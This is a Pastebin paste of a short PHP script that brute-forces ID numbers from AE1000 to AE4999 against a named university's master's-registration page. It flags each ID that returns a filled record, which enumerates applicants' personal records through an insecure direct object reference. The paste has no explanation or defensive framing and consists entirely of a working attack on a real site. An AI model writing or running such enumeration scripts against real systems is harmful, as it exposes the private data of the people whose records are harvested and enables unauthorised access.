Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(10000);
- $aa='http://www.fsr.ac.ma/inscription/impMaster.php?CINE=';
- ;
- $chaine="AE";
- for($i=1000;$i<5000;$i++)
- {
- echo $chaine.$i."<br/>";
- if(!strstr(file_get_contents('http://www.fsr.ac.ma/inscription/impMaster.php?CINE='.$chaine.$i),"<td></td>")) echo "ok";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment